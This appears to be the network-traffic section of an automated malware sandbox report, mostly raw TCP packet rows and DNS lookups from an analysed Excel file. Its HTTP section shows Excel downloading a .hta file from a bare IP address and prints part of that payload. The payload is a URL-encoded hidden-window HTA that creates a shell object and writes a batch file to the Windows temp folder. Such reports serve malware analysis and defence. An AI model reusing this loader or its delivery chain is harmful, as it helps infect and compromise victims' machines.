                                          Mar 26, 2025 08:12:54.855465889 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.855490923 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.855552912 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.855559111 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.855608940 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.882302046 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.882322073 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.882371902 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.882376909 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.882426023 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.913306952 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.913331985 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.913374901 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.913379908 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.913440943 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.951752901 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.951781034 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.951831102 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.951845884 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.951889038 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979367018 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979393005 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979434967 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979448080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979470968 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979487896 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.006936073 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.006963015 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.007003069 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.007016897 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.007050991 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.007067919 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.045978069 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046001911 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046060085 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.046073914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046107054 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.069334030 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069360018 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069403887 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.069417953 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069468021 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093151093 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093177080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093210936 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093225002 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093245029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093264103 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138804913 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138840914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138880014 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138899088 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138931990 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138952017 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260024071 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260051966 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260093927 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260116100 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260137081 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260139942 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260163069 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260173082 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260185957 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260191917 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260227919 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260236979 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260262012 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260284901 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260292053 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260303020 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260341883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263271093 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263289928 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263329029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263343096 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263367891 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263386011 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300359964 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300429106 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300457001 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300472975 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300498962 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300519943 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352034092 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352083921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352106094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352122068 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352135897 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352165937 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388721943 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388777971 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388798952 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388809919 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388838053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388851881 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442804098 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442866087 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442893028 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442903996 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442929029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442948103 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474087000 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474133015 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474164009 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474169970 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474199057 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474217892 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528127909 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528196096 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528206110 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528229952 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528243065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528289080 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568067074 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568128109 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568157911 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568169117 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568201065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568227053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607492924 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607547045 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607594967 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607605934 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607625961 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607649088 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653156996 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653212070 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653292894 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653292894 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653305054 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653451920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.766732931 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766789913 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766823053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.766830921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766886950 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827750921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827814102 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827914953 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827915907 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827918053 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827951908 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828003883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828003883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828006029 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828032970 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828078032 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828078032 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858773947 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858802080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858907938 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858907938 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858916998 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858961105 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925144911 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925194979 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925280094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925280094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925288916 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925434113 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.058860064 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.058943987 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.058964014 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.058978081 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059006929 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059051991 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059062958 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059093952 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059123039 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059142113 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059195995 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059195995 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059202909 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059351921 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226135969 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226162910 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226201057 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226205111 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226222038 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226242065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226243019 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226270914 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226556063 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226562977 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.227047920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334284067 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334312916 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334425926 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334425926 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334440947 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334825993 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450032949 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450062990 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450179100 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450179100 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450193882 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450537920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557138920 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557169914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557214975 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557233095 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557251930 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557287931 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557450056 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557596922 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557619095 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557698965 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557698965 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557708025 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557713985 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.150660992 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.150703907 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.150974989 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151371002 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151379108 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.151380062 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151427984 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.151492119 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151617050 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151631117 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.432461023 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433166027 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.433181047 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433482885 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433821917 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.433854103 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.434560061 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.434581995 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.434721947 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.434748888 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617794037 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617825031 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617883921 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617883921 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618026018 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618252993 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618275881 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.618304014 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618310928 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635813951 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635896921 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635972023 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636333942 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636358976 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.636374950 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636383057 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:36.220487118 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:36.548090935 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:37.188719034 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:38.454374075 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:40.985586882 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:46.032517910 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:56.126231909 CET4969880192.168.2.7209.46.124.102
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 26, 2025 08:12:37.069842100 CET5844953192.168.2.71.1.1.1
                                          Mar 26, 2025 08:12:38.073703051 CET5844953192.168.2.71.1.1.1
                                          Mar 26, 2025 08:12:39.073786974 CET5844953192.168.2.71.1.1.1
                                          Mar 26, 2025 08:12:39.189438105 CET53584491.1.1.1192.168.2.7
                                          Mar 26, 2025 08:12:52.969202995 CET5345553192.168.2.71.1.1.1
                                          Mar 26, 2025 08:12:53.087416887 CET53534551.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Mar 26, 2025 08:12:37.069842100 CET192.168.2.71.1.1.10x397bStandard query (0)agr.myA (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:12:38.073703051 CET192.168.2.71.1.1.10x397bStandard query (0)agr.myA (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:12:39.073786974 CET192.168.2.71.1.1.10x397bStandard query (0)agr.myA (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:12:52.969202995 CET192.168.2.71.1.1.10xa410Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Mar 26, 2025 08:11:47.936304092 CET1.1.1.1192.168.2.70xc6c1No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 26, 2025 08:11:47.936304092 CET1.1.1.1192.168.2.70xc6c1No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:11:47.936304092 CET1.1.1.1192.168.2.70xc6c1No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:11:48.372292042 CET1.1.1.1192.168.2.70xa505No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:11:48.372292042 CET1.1.1.1192.168.2.70xa505No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:12:39.189438105 CET1.1.1.1192.168.2.70x397bNo error (0)agr.my147.79.86.93A (IP address)IN (0x0001)false
                                          Mar 26, 2025 08:12:53.087416887 CET1.1.1.1192.168.2.70xa410No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 26, 2025 08:12:53.087416887 CET1.1.1.1192.168.2.70xa410No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 26, 2025 08:12:53.087416887 CET1.1.1.1192.168.2.70xa410No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 26, 2025 08:12:53.087416887 CET1.1.1.1192.168.2.70xa410No error (0)shed.dual-low.s-part-0010.t-0009.t-msedge.nets-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 26, 2025 08:12:53.087416887 CET1.1.1.1192.168.2.70xa410No error (0)s-part-0010.t-0009.t-msedge.net13.107.246.38A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • agr.my
                                          • otelrules.svc.static.microsoft
                                          • 209.46.124.102

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749698209.46.124.102807144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          Mar 26, 2025 08:12:40.232326984 CET257OUTGET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Connection: Keep-Alive
                                          Host: 209.46.124.102
                                          Mar 26, 2025 08:12:40.350461960 CET1254INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:12:40 GMT
                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                          Last-Modified: Wed, 26 Mar 2025 06:34:31 GMT
                                          ETag: "c9e-6313907aa7b9e"
                                          Accept-Ranges: bytes
                                          Content-Length: 3230
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/hta
                                          Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 69 74 6c 65 25 33 45 45 78 65 63 75 74 61 72 25 32 30 53 63 72 69 70 74 25 33 43 2f 74 69 74 6c 65 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 48 54 41 25 33 41 41 50 50 4c 49 43 41 54 49 4f 4e 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 25 33 44 25 32 32 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 42 4f 52 44 45 52 25 33 44 25 32 32 6e 6f 6e 65 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 43 41 50 54 49 4f 4e 25 33 44 25 32 32 6e 6f 25 32 [TRUNCATED]
                                          Data Ascii: <script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EExecutar%20Script%3C/title%3E%0A%20%20%20%20%3CHTA%3AAPPLICATION%20%0A%20%20%20%20%20%20%20%20APPLICATIONNAME%3D%22ScriptExecutor%22%0A%20%20%20%20%20%20%20%20BORDER%3D%22none%22%0A%20%20%20%20%20%20%20%20CAPTION%3D%22no%22%0A%20%20%20%20%20%20%20%20SHOWINTASKBAR%3D%22no%22%0A%20%20%20%20%20%20%20%20SINGLEINSTANCE%3D%22yes%22%0A%20%20%20%20%20%20%20%20WINDOWSTATE%3D%22minimize%22%0A%20%20%20%20/%3E%0A%20%20%20%20%3Cscript%20language%3D%22VBScript%22%3E%0A%20%20%20%20%20%20%20%20Dim%20lepismid%0A%20%20%20%20%20%20%20%20Set%20lepismid%20%3D%20CreateObject%28%22WScript.Shell%22%29%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20sternebral%0A%20%20%20%20%20%20%20%20sternebral%20%3D%20%22C%3A%5CWindows%5CTemp%5Chorripilant.bat%22%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20thermal%2C%20grec
                                          Mar 26, 2025 08:12:40.350495100 CET1254INData Raw: 6f 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 53 65 74 25 32 30 74 68 65 72 6d 61 6c 25 32 30 25 33 44 25 32 30 43 72 65 61 74 65 4f 62 6a 65 63 74 25 32 38 25 32 32 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65
                                          Data Ascii: o%0A%20%20%20%20%20%20%20%20Set%20thermal%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0A%20%20%20%20%20%20%20%20Set%20greco%20%3D%20thermal.CreateTextFile%28sternebral%2C%20True%29%0A%0A%20%20%20%20%20%20%20%20Dim%20gainsaying%0
